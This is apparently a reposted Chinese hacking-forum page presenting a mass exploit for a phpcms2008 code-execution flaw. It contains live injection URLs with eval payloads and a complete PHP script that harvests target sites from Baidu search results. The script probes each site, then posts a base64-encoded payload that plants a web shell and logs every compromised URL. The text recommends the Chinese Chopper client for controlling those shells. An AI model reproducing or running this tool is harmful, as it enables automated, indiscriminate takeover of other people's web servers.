php批量getshell,getshell_phpcms2008 代码执行 批量getshell EXP(使用菜刀)_dedecms
玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了 那老衲也发吧
谷歌批量还需改进 一会儿会补上!
原文:
http://www.wooyun.org/bug.php?action=view&id=2984
测试如下:
http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()}
测试结果:
http://www.cnqiyou.com/yp/product.php?pagesize=${@phpinfo()}
EXP:
http://www.cnqiyou.com/yp/product.php?pagesize=${${@eval%28$_POST[cmd]%29}}
直接菜刀链接 http://www.jb51.net/softs/163997.html
批量EXP:
PS:根据百度搜索批量
复制代码代码如下:
error_reporting(E_ERROR);
set_time_limit(0);
$keyword="inurl:about/joinus" ; // 批量关键字
$timeout = 1;
$stratpage = 1;
$lastpage = 10000000;
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){
$array=ReadBaiduList($keyword,$timeout,$i);
foreach ($array as $url ){
$url_list=file("url.txt");
if (in_array("$url\r\n",$url_list)){
echo "[-] Links repeat\n";
}else{
$fp = @fopen("url.txt", "a");
@fwrite($fp, $url."\r\n");
@fclose($fp);
print_r("
[-] Get ...... $url\r\n");
if(okbug($url)){
$exploit=exploit($url);
$ors=okor($url);
if ($ors){
echo "[*] Shell:-> ".$url."/yp/fuck.php\n";
$fp = @fopen("shell.txt", "a");
@fwrite($fp, $url."/yp/fuck.php\r\n");
@fclose($fp);
}
}else{
print "[-] No Bug!\n";
}
}
}
}
function exploit($url){
$host=$url;
$port="80";
$content ="a=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskZnAgPSBAZm9wZW4oJ2Z1Y2sucGhwJywgJ2EnKTsgDQoNQGZ3cml0ZSgkZnAsJzw%2FcGhwIEBldmFsKCRfUE9TVFtjZmtpbmddKTs%2FPicpOw0KDUBmY2xvc2UoJGZwKTs7ZWNobygifDwtIik7ZGllKCk7";
$data = "POST /yp/product.php?pagesize=${${@eval%28$_POST[a]%29}} HTTP/1.1"."\r\n";
$data .= "X-Forwarded-For: 199.1.88.29\r\n";
$data .= "Referer: http://$host\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n";
$data .= "Cache-Control: no-cache\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*] No response from $host\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
function okor($host){
$tmp = array();
$data = "";
$fp = @fsockopen($host,80,$errno,$errstr,60);
@fputs($fp,"GET /yp/fuck.php HTTP/1.1\r\nHost:$host\r\nConnection: Close\r\n\r\n");
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
if (strpos($data, "200") !== false) {
return true;
}else{
return false;
}
}
function okbug($host){
$tmp = array();
$data = "";
$fp = @fsockopen($host,80,$errno,$errstr,60);
@fputs($fp,"GET /yp/product.php?view_type=1&catid=&pagesize={${phpinfo()}}&areaname=&order= HTTP/1.1"."\r\nHost:$host\r\nConnection: Close\r\n\r\n");
while ($fp && !feof($fp))
$data .= fread($fp, 102400);
@fclose($fp);
if(preg_match("/(php.ini)/i",$data)) {
return true;
}else{
return false;
}
}
function ReadBaiduList($keyword,$timeout,$nowpage)
{
$tmp = array();
//$data = "";
$nowpage = ($nowpage-1)*10;
$fp = @fsockopen("www.baidu.com",80,$errno,$errstr,$timeout);
@fputs($fp,"GET /s?wd=".urlencode($keyword)."&pn=".$nowpage." HTTP/1.1\r\nHost:[url]www.baidu.com[/url]\r\nConnection: Close\r\n\r\n");
while ($fp && !feof($fp))
$data .= fread($fp, 1024);
@fclose($fp);
preg_match_all("/\}\)\" href\=\"http\:\/\/([^~]*?)\" target\=\"\_blank\"/i",$data,$tmp);
$num = count($tmp[1]);
$array = array();
for($i = 0;$i < $num;$i++)
{
$row = explode("/",$tmp[1][$i]);
$array[] = str_replace("http://","",$row[0]);
}
return $array;
}
?>
420x319
420x319-25K-JPG
phpcms2008 代码执行 批量getshell EXP(使用...
相关搜索:getshell dedecms getshell uckey getshell php getshell phpcmsv9批量替换 菜刀夫妇 机器铃 砍菜刀 机器灵砍菜刀 qq号码批量申请器
php批量getshell,getshell_phpcms2008 代码执行 批量getshell EXP(使用菜刀)_dedecms相关推荐
- php批量上传代码,文件批量上传_php文件上传代码(支持文件批量上传)
摘要 腾兴网为您分享:php文件上传代码(支持文件批量上传),雨课堂版,洋游码头,学堂里,小度等软件知识,以及电脑硬件温度检测软件,日事清app,lol韩服语音包,绝地求生无后座力设置,金山u盘卫士, ...
- python批量修改文件名代码_python批量修改文件名的示例
今天中午看了一集动漫<进击的巨人>,看完后发现这些视频的名称有点乱,于是编程来批量重命名. 重命名之前的各名称格式为--飞极速[www.feijisu.com][16][720P][CHS ...
- [EXP]CVE-2019-9621 Zimbra小于8.8.11 远程代码执行漏洞 XXE GetShell Exploit
漏洞描述: 当 Zimbra 存在像任意文件读取.XXE(xml外部实体注入)这种漏洞时,攻击者可以利用此漏洞读取 localconfig.xml配置文件,获取到 zimbra admin ldap ...
- thinkphp5调用shell脚本_thinkphp5.x全版本任意代码执行getshell
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的ge ...
- Bash Shellshock(Bash远程代码执行)漏洞批量利用脚本
Bash远程代码执行漏洞的威力确实要比心脏滴血大很多,但是影响范围不是很广泛,不过昨天的分析文章Bash远程代码执行漏洞分析中末尾提到了这个漏洞的批量问题. 其中最最简单的方法就是使用搜索引擎的hac ...
- Apache CouchDB 代码执行漏洞(CVE-2022-24706 )批量POC
Apache CouchDB 代码执行漏洞(CVE-2022-24706 ) 由于CouchDB的默认安装配置存在缺陷,最终可导致攻击者通过访问特定端口,绕过权限校验并获得管理员权限 CVE-2022 ...
- python 批量下载 代码_Python + Selenium +Chrome 批量下载网页代码修改
Python + Selenium +Chrome 批量下载网页代码修改 主要修改以下代码可以调用 本地的 user-agent.txt 和 cookie.txt 来达到在登陆状态下 批量打开并下载网 ...
- 用.NET SqlBulkCopy类执行批量复制
在不同数据源之间转移数据是一个常见的开发任务.如果你应用过SQL Server,就会熟悉bcp(批量复制)命令. 它允许你快速将大型文件批量复制到SQL Server表或视图中.在.NET Frame ...
- PHP无法执行MySQL语句,解决PHP执行批量MySQL语句的问题
这篇文章主要为大家详细介绍了解决PHP执行批量MySQL语句的问题,具有一定的参考价值,可以用来参考一下. 感兴趣的小伙伴,下面一起跟随512笔记的小玲来看看吧! 当有多条mysql语句连起来需要执行 ...
最新文章
- 何时开学?教育部最新回应:满足三个条件可开学
- hdu 5092 线裁剪(纵向连线最小和+输出路径)
- TypeScript和JavaScript哪种语言更先进
- mybatis支持驼峰自动转换sql吗_SpringBoot整合mybatis——配置mybatis驼峰命名规则自动转换...
- bzoj:1026: [SCOI2009]windy数(数位dp)
- WebStorm 关联 TFS(转)
- python PHP 多进程,python多进程的用法示例(代码)
- EMD Earth Movers Distance
- 研究生期间如何成为科研大佬?
- Atitit xml命名空间机制
- Runtime library, CRT
- Android读书笔记
- 变量命名20201106-01
- PaddlePaddle/PaddleOCR 中英文文字识别
- 【python 题练】
- DB2 set current schema也能导致锁升级(lock escalation)?
- PyCharm external tools
- 欧莱雅进博会展示口红打印机、超节水洗发产品;霍尼韦尔进博会签约顺丰集团、博腾股份 | 美通社头条...
- 哈哈日语入门,五十音图学习方法
- 网络空间测绘国内外发展及现状